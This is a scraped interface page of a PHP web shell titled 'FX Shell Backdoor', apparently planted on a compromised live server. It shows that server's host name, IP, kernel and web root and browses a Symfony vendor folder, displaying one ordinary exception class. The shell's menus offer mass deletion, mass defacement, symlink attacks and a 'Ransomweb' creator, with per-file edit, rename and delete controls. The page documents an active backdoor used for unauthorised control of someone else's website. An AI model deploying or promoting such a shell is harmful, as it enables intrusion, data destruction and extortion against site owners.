FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
home
/
ubuntu
/
vendor
/
symfony
/
http-foundation
/
Exception
/
Upload
Buat File
Buat Folder
Buat Ransomweb
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpFoundation\Exception; /** * Raised when a session does not exist. This happens in the following cases: * - the session is not enabled * - attempt to read a session outside a request context (ie. cli script). * * @author Jérémy Derussé <jeremy@derusse.com> */ class SessionNotFoundException extends \LogicException implements RequestExceptionInterface { public function __construct(string $message = 'There is currently no session available.', int $code = 0, ?\Throwable $previous = null) { parent::__construct($message, $code, $previous); } }
BadRequestException.php
Choose...
Edit
Rename
Delete
Now
ConflictingHeadersException.php
Choose...
Edit
Rename
Delete
Now
JsonException.php
Choose...
Edit
Rename
Delete
Now
RequestExceptionInterface.php
Choose...
Edit
Rename
Delete
Now
SessionNotFoundException.php
Choose...
Edit
Rename
Delete
Now
SuspiciousOperationException.php
Choose...
Edit
Rename
Delete
Now